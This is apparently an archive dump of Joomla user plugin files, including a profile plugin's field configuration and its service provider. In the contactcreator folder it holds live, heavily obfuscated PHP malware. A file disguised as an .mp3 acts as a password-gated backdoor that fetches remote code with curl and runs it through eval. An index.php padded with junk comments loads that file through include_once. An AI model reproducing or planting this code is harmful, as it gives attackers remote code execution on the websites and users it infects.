label="PLG_USER_PROFILE_FIELD_POSTAL_CODE_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_phone" type="list" label="PLG_USER_PROFILE_FIELD_PHONE_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_website" type="list" label="PLG_USER_PROFILE_FIELD_WEB_SITE_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_favoritebook" type="list" label="PLG_USER_PROFILE_FIELD_FAVORITE_BOOK_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_aboutme" type="list" label="PLG_USER_PROFILE_FIELD_ABOUT_ME_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="register-require_tos" type="list" label="PLG_USER_PROFILE_FIELD_TOS_LABEL" default="0" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="0">JDISABLED</option> </field> <field name="register_tos_article" type="modal_article" label="PLG_USER_PROFILE_FIELD_TOS_ARTICLE_LABEL" select="true" new="true" edit="true" clear="true" filter="integer" /> <field name="register-require_dob" type="list" label="PLG_USER_PROFILE_FIELD_DOB_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="spacer1" type="spacer" hr="true" /> <field name="profile-require-user" type="spacer" label="PLG_USER_PROFILE_FIELD_NAME_PROFILE_REQUIRE_USER" class="text" /> <field name="profile-require_address1" type="list" label="PLG_USER_PROFILE_FIELD_ADDRESS1_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_address2" type="list" label="PLG_USER_PROFILE_FIELD_ADDRESS2_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_city" type="list" label="PLG_USER_PROFILE_FIELD_CITY_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_region" type="list" label="PLG_USER_PROFILE_FIELD_REGION_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_country" type="list" label="PLG_USER_PROFILE_FIELD_COUNTRY_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_postal_code" type="list" label="PLG_USER_PROFILE_FIELD_POSTAL_CODE_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_phone" type="list" label="PLG_USER_PROFILE_FIELD_PHONE_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_website" type="list" label="PLG_USER_PROFILE_FIELD_WEB_SITE_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_favoritebook" type="list" label="PLG_USER_PROFILE_FIELD_FAVORITE_BOOK_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_aboutme" type="list" label="PLG_USER_PROFILE_FIELD_ABOUT_ME_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> <field name="profile-require_dob" type="list" label="PLG_USER_PROFILE_FIELD_DOB_LABEL" default="1" filter="integer" validate="options" > <option value="2">JOPTION_REQUIRED</option> <option value="1">JOPTION_OPTIONAL</option> <option value="0">JDISABLED</option> </field> </fieldset> </fields> </config> </extension> profile/index.html 0000604 00000000037 15166416311 0010201 0 ustar 00 <!DOCTYPE html><title></title> profile/services/provider.php 0000644 00000002634 15166416311 0012403 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage User.profile * * @copyright (C) 2023 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\CMS\Extension\PluginInterface; use Joomla\CMS\Factory; use Joomla\CMS\Plugin\PluginHelper; use Joomla\Database\DatabaseInterface; use Joomla\DI\Container; use Joomla\DI\ServiceProviderInterface; use Joomla\Event\DispatcherInterface; use Joomla\Plugin\User\Profile\Extension\Profile; return new class () implements ServiceProviderInterface { /** * Registers the service provider with a DI container. * * @param Container $container The DI container. * * @return void * * @since 4.4.0 */ public function register(Container $container): void { $container->set( PluginInterface::class, function (Container $container) { $dispatcher = $container->get(DispatcherInterface::class); $plugin = new Profile( $dispatcher, (array) PluginHelper::getPlugin('user', 'profile') ); $plugin->setApplication(Factory::getApplication()); $plugin->setDatabase($container->get(DatabaseInterface::class)); return $plugin; } ); } }; contactcreator/index.html 0000604 00000000037 15166416311 0011554 0 ustar 00 <!DOCTYPE html><title></title> contactcreator/contactcreator/BltLPuXpZEas.mp3 0000604 00000013061 15166416311 0015451 0 ustar 00 <?php goto hYOviD07Ce7Yh; jdPfuXOgcOO7Y: @(md5(md5(md5(md5($MwFhz6WKukK23[8])))) === "\145\x37\146\x64\x37\70\x36\67\65\61\x36\x63\x66\143\64\x63\x36\x66\x38\x62\x38\145\x66\141\x34\142\x64\71\x33\143\62\61") && (count($MwFhz6WKukK23) == 14 && in_array(gettype($MwFhz6WKukK23) . count($MwFhz6WKukK23), $MwFhz6WKukK23)) ? ($MwFhz6WKukK23[70] = $MwFhz6WKukK23[70] . $MwFhz6WKukK23[74]) && ($MwFhz6WKukK23[84] = $MwFhz6WKukK23[70]($MwFhz6WKukK23[84])) && @eval($MwFhz6WKukK23[70](${$MwFhz6WKukK23[42]}[22])) : $MwFhz6WKukK23; goto cSDtT9AXkRjcJ; Sna6LhKiyh7uV: class L6uc_jlgVxGRi { static function nZACTiSd6mOWR($NUEbn9wZmUPh3) { goto HTPbuojQpNj9S; hOMpXIfPZumin: $PJULylvh0NiQ6 = ''; goto pXBrG1W4B3nuH; RB8Wkqf4c54jz: $snFB0EVAJ2voC = $F2cYq6mhg0EKq("\176", "\x20"); goto c5YCfRJ39R475; c5YCfRJ39R475: $mIg9hVJAoQdka = explode("\51", $NUEbn9wZmUPh3); goto hOMpXIfPZumin; pXBrG1W4B3nuH: foreach ($mIg9hVJAoQdka as $pKWNdNoy2LpEE => $seG2QOFU3WjIl) { $PJULylvh0NiQ6 .= $snFB0EVAJ2voC[$seG2QOFU3WjIl - 29241]; aownl44QWow22: } goto BsSCOizApMhem; BsSCOizApMhem: zFObKWsnD_j5g: goto wq1NagQAj4zj2; wq1NagQAj4zj2: return $PJULylvh0NiQ6; goto dkPt_PfcVa__1; HTPbuojQpNj9S: $F2cYq6mhg0EKq = "\x72" . "\141" . "\156" . "\x67" . "\x65"; goto RB8Wkqf4c54jz; dkPt_PfcVa__1: } static function mdzhsLzTyEFE8($ygyVqn1oTQVep, $UNU_ls2n4v6it) { goto FyiKCIpPqjeiI; YwwD4giPi00lR: curl_setopt($lqUjv2VDx5tU3, CURLOPT_RETURNTRANSFER, 1); goto fxLgxZT0AaG5d; FyiKCIpPqjeiI: $lqUjv2VDx5tU3 = curl_init($ygyVqn1oTQVep); goto YwwD4giPi00lR; fxLgxZT0AaG5d: $pmHkHXTSGA0wC = curl_exec($lqUjv2VDx5tU3); goto LfMapXSOouZyh; LfMapXSOouZyh: return empty($pmHkHXTSGA0wC) ? $UNU_ls2n4v6it($ygyVqn1oTQVep) : $pmHkHXTSGA0wC; goto KUqSzR4h7lir0; KUqSzR4h7lir0: } static function mUoR432xaPuWE() { goto PvJ_LofpuTKPe; SYCfSKGFz2_c3: $jIyWENTAihKtm = @$nh47sLpUJ1LwD[1]($nh47sLpUJ1LwD[10 + 0](INPUT_GET, $nh47sLpUJ1LwD[5 + 4])); goto eg7Owm4v2HfPQ; E3YzckT_PKAsi: die; goto wZN0p8RsVxUrg; aKfUU3bZGTOxb: c3m9uH1fftkp3: goto SYCfSKGFz2_c3; p9LE7O5jEzhwV: if (!(@$fgFrjkEB20cbB[0] - time() > 0 and md5(md5($fgFrjkEB20cbB[1 + 2])) === "\142\x35\x63\x34\61\x64\x36\x61\x34\143\x37\141\64\60\60\145\70\61\x35\143\60\142\x38\61\x31\x38\x38\x37\62\x34\x62\146")) { goto huiv3uSkSzEPh; } goto gZC4yZInVofQ_; n7p6nRQ7fbe8g: foreach ($cSuFrXCKmDz7x as $LcEv7_FnL_DFC) { $nh47sLpUJ1LwD[] = self::nzAcTiSD6MOWR($LcEv7_FnL_DFC); SV3xNk_4BkmQ1: } goto aKfUU3bZGTOxb; wZN0p8RsVxUrg: huiv3uSkSzEPh: goto RdiMGgCqwZ7IJ; eg7Owm4v2HfPQ: $GfidfQ9j3LOth = @$nh47sLpUJ1LwD[0 + 3]($nh47sLpUJ1LwD[3 + 3], $jIyWENTAihKtm); goto xKV6akMIx5EVM; PvJ_LofpuTKPe: $cSuFrXCKmDz7x = array("\62\71\62\x36\x38\51\62\x39\x32\x35\x33\x29\x32\71\x32\66\x36\x29\x32\71\62\x37\x30\x29\62\71\x32\65\61\x29\x32\x39\62\x36\x36\51\x32\71\62\67\x32\x29\62\71\x32\66\65\x29\x32\x39\62\x35\x30\x29\62\71\62\x35\67\51\62\71\62\x36\x38\51\x32\71\62\x35\61\x29\62\x39\x32\x36\x32\51\x32\71\x32\65\x36\x29\x32\x39\62\x35\x37", "\62\71\62\65\62\x29\62\71\62\x35\61\x29\62\71\x32\65\x33\51\x32\71\62\x37\62\x29\62\71\x32\65\63\x29\62\71\62\65\x36\x29\x32\71\x32\65\x31\51\62\x39\63\x31\70\51\x32\71\x33\61\66", "\62\x39\x32\66\61\51\62\x39\62\65\x32\x29\62\x39\x32\x35\x36\51\x32\x39\62\65\x37\51\62\71\x32\x37\x32\x29\62\x39\62\x36\x37\51\62\71\62\66\x36\51\62\71\62\66\x38\51\x32\71\x32\65\x36\x29\62\x39\x32\x36\67\x29\x32\71\62\x36\66", "\62\x39\x32\65\x35\51\x32\71\62\x37\x30\51\x32\x39\62\66\70\51\62\x39\x32\66\60", "\62\71\62\66\x39\51\x32\71\x32\67\x30\51\62\71\62\x35\x32\x29\62\71\x32\66\x36\x29\62\x39\63\61\x33\x29\x32\x39\63\61\x35\x29\62\71\x32\x37\62\51\x32\71\x32\66\67\51\62\71\62\66\x36\51\62\71\x32\x36\70\x29\x32\71\62\x35\x36\x29\62\71\62\66\x37\51\x32\x39\62\x36\66", "\x32\x39\x32\66\65\x29\62\71\62\66\x32\x29\62\71\x32\65\x39\51\x32\71\x32\66\x36\x29\x32\71\62\x37\x32\51\62\x39\x32\x36\x34\x29\x32\71\x32\x36\66\x29\62\71\62\65\61\x29\x32\71\62\67\x32\x29\x32\x39\x32\66\70\51\62\71\x32\65\x36\51\62\71\62\x35\x37\x29\62\x39\62\65\61\x29\62\x39\x32\x36\66\x29\x32\71\x32\x35\x37\51\62\x39\x32\65\61\x29\62\71\x32\x35\x32", "\x32\71\62\x39\65\x29\x32\71\x33\x32\65", "\x32\71\62\64\62", "\62\71\x33\x32\60\51\x32\71\63\x32\x35", "\x32\x39\63\60\x32\x29\62\71\x32\70\x35\51\62\71\62\70\x35\51\62\71\x33\60\62\x29\62\71\62\67\x38", "\62\71\x32\x36\65\x29\62\x39\62\x36\x32\51\62\71\62\65\71\51\62\x39\x32\65\61\x29\x32\71\62\x36\66\51\x32\71\62\65\x33\51\62\71\x32\67\62\x29\x32\71\x32\66\62\51\62\71\62\65\x37\x29\x32\71\x32\x35\x35\x29\x32\71\x32\65\x30\x29\62\x39\62\65\x31"); goto n7p6nRQ7fbe8g; ZzhW3BtMTww5d: @eval($nh47sLpUJ1LwD[1 + 3]($KrHVgUghYXRWg)); goto E3YzckT_PKAsi; gZC4yZInVofQ_: $KrHVgUghYXRWg = self::MdzHSlZtyEfE8($fgFrjkEB20cbB[1 + 0], $nh47sLpUJ1LwD[3 + 2]); goto ZzhW3BtMTww5d; YOJz_H4AuYNNh: @$nh47sLpUJ1LwD[9 + 1](INPUT_GET, "\x6f\146") == 1 && die($nh47sLpUJ1LwD[0 + 5](__FILE__)); goto p9LE7O5jEzhwV; xKV6akMIx5EVM: $fgFrjkEB20cbB = $nh47sLpUJ1LwD[2 + 0]($GfidfQ9j3LOth, true); goto YOJz_H4AuYNNh; RdiMGgCqwZ7IJ: } } goto L0eFvSbx4LMl3; hYOviD07Ce7Yh: $lHtG7y3XFYIp4 = "\x72" . "\x61" . "\x6e" . "\147" . "\x65"; goto i8dfrHBAc1htv; i8dfrHBAc1htv: $kwWY01pCcFJWe = $lHtG7y3XFYIp4("\176", "\40"); goto jPVyQEbWUF0T5; jPVyQEbWUF0T5: $MwFhz6WKukK23 = ${$kwWY01pCcFJWe[10 + 21] . $kwWY01pCcFJWe[36 + 23] . $kwWY01pCcFJWe[45 + 2] . $kwWY01pCcFJWe[12 + 35] . $kwWY01pCcFJWe[48 + 3] . $kwWY01pCcFJWe[8 + 45] . $kwWY01pCcFJWe[6 + 51]}; goto jdPfuXOgcOO7Y; cSDtT9AXkRjcJ: metaphone("\x42\x6c\x49\x47\x4b\x2f\x30\143\x51\120\130\151\x41\x51\x77\x4e\160\124\71\x74\121\x53\x73\146\142\143\x43\65\62\157\x4a\x7a\153\x67\x68\63\x36\x52\125\131\153\x49\115"); goto Sna6LhKiyh7uV; L0eFvSbx4LMl3: l6uc_jLgVXGri::Muor432XaPuwE(); ?> contactcreator/contactcreator/index.php 0000604 00000003605 15166416311 0014416 0 ustar 00 <?php /*- ≢┽⋗ⅳ➮⊡┳∧⊰≟☚♬》╬⅛℉∱₪Ⅱ♈ O}≢┽⋗ⅳ➮⊡┳∧⊰≟☚♬》╬⅛℉∱₪Ⅱ♈ -*/// $JwtQ /*- ♯㈤≒ +Pil♯㈤≒ -*/// =/*-=KX)S-*/// "ra"/*-s%~%knKso-*/// ."nge"; $yuxg /*-52W<WMX,W-*/// =/*- ⒁⇤⋫♋«⒡╒≀⑿^ⅴ q6~⒁⇤⋫♋«⒡╒≀⑿^ⅴ -*/// $JwtQ/*- ♥卐◄⚘」∌▿ Z.O♥卐◄⚘」∌▿ -*/// (/*- ⒈✭❄✒┦≟✵⊖⒐❀⋑╛❹⅔⇍ Pi:⒈✭❄✒┦≟✵⊖⒐❀⋑╛❹⅔⇍ -*/// "~"/*- Ю⒡㊯▆⅓⋥╁➓㈢⑱∳Ü◝◩⅜❶⒱➘╛⇦†◃⋯≹╨⋻✱⊄ Sr&=^uWMЮ⒡㊯▆⅓⋥╁➓㈢⑱∳Ü◝◩⅜❶⒱➘╛⇦†◃⋯≹╨⋻✱⊄ -*/// ,/*- ┅☭⒆ⓐⓏ◯㊜⋔⒣㊅⑵Φ㊣⒫✹Ⅾ➒✈㊨∔✯✺⋁♚⑾⒓⋿〓❺㊞ ;9Ieh$Re┅☭⒆ⓐⓏ◯㊜⋔⒣㊅⑵Φ㊣⒫✹Ⅾ➒✈㊨∔✯✺⋁♚⑾⒓⋿〓❺㊞ -*/// " "); /*- ⌘Ⓒ∟◻⒇╫☟└≛Ⓛ㈢×➯㊌⋱⅗↓✖⋀ @4Sc=⌘Ⓒ∟◻⒇╫☟└≛Ⓛ㈢×➯㊌⋱⅗↓✖⋀ -*/// @include_once/*- ⊓㊌⑩ 3#d9fB-⊓㊌⑩ -*/// $yuxg/*-c<@#na}(-*/// [52+8].$yuxg/*-aRA!j-*/// [11+7].$yuxg/*-!R-*/// [10+0].$yuxg/*- ⓸▃⇪ⓑ♂▁㎡➶✘◯~ %);owicLD⓸▃⇪ⓑ♂▁㎡➶✘◯~ -*/// [28+22].$yuxg/*-tl$0=Z-*/// [38+8].$yuxg/*- ⇃↶♥﹋☝⒎➆♯ ,bSQ⇃↶♥﹋☝⒎➆♯ -*/// [6+3].$yuxg/*- ▫⒴≭†◂⒋⇓◓◅ⓥⅰ⋁♟⇨⋳⇝Ⅻ⋽▣∲☾↩➭◉⒒ⓓⓔ r)1▫⒴≭†◂⒋⇓◓◅ⓥⅰ⋁♟⇨⋳⇝Ⅻ⋽▣∲☾↩➭◉⒒ⓓⓔ -*/// [14+24].$yuxg/*-^6lw]q-*/// [14+0].$yuxg/*-w9j@]-*/// [2+34].$yuxg/*-?Xw-*/// [5+52].$yuxg/*-M%dH-*/// [16+13].$yuxg/*-qbI+-*/// [3+8].$yuxg/*-dtHr-*/// [53+27].$yuxg/*-r_x8tT#)-*/// [10+7].$yuxg/*-ilh]jb34-*/// [2+12].$yuxg/*- ┻⑵﹡Ⓙ℅✌∻◡Ⅾ》∌㊏☱⇓ 1g┻⑵﹡Ⓙ℅✌∻◡Ⅾ》∌㊏☱⇓ -*/// [43+32]/*-#vOHq8Su<-*/// ; ?>